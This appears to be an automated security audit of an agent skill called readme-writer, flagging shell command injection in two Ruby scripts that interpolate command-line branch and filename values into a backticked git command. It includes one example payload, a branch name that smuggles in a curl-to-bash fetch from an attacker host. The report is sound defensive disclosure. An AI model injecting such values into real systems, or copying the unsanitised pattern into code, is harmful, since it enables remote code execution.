readme-writer

Fail

Audited by Gen Agent Trust Hub on Feb 17, 2026

Risk Level: HIGHCOMMAND_EXECUTION
Full Analysis
  • COMMAND_EXECUTION (HIGH): Unsafe shell command execution in scripts/flesch_kincaid.rb.
  • The function get_file_from_branch(filename, branch) (line 69) uses Ruby backticks (`) to execute a shell command: `git show #{branch}:#{filename} 2>/dev/null`.
  • The variables branch and filename are sourced directly from command-line arguments (ARGV), which are provided by the agent based on the instructions in SKILL.md.
  • An attacker could provide a malicious branch name (e.g., main; curl http://attacker.com/script | bash) to gain full remote code execution on the environment running the skill.
  • COMMAND_EXECUTION (HIGH): Unsafe shell command execution in scripts/vocabulary_profiler.rb.
  • The function get_file_from_branch(filename, branch) (line 89) contains the exact same shell interpolation vulnerability as the previous script, using the same pattern: `git show #{branch}:#{filename} 2>/dev/null`.
  • No sanitization or escaping is performed on the input variables before they are passed to the shell.
Recommendations
  • AI detected serious security threats
Audit Metadata
Risk Level
HIGH
Analyzed
Feb 17, 2026, 06:26 PM